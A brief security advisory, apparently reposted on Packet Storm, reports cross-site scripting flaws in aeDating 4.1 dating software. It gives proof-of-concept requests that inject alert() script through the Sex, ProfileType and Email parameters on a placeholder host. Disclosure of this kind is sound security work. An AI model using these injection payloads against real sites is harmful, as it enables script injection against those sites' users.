aeDating version 4.1 is susceptible to cross site scripting attacks.
035c6f9fdd0f0a676839917ea44cee5aProduct of AEwebworks Dating Software
http://www.aewebworks.com/
---------------------------
Cross Site Scripting (XSS)
---------------------------
http://target.xx:80/index.php?Sex="><script>alert(/Elipsis+Security+Test/)</script>&Mode=last
^"G4" Template work^
---
POST /join_form.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 1685
page=1&ID=1&ProfileType="><script>alert(/Elipsis+Security+Test/)</script>&NickName=1&RealName=1&Sex=female&Country=0&City=1&zip=1&Children=0&WhereChildren=
---
POST /forgot.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 65
Email="><script>alert(/Elipsis+Security+Test/)</script>
-----------------
Ellipsis Security
http://www.ellsec.org
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!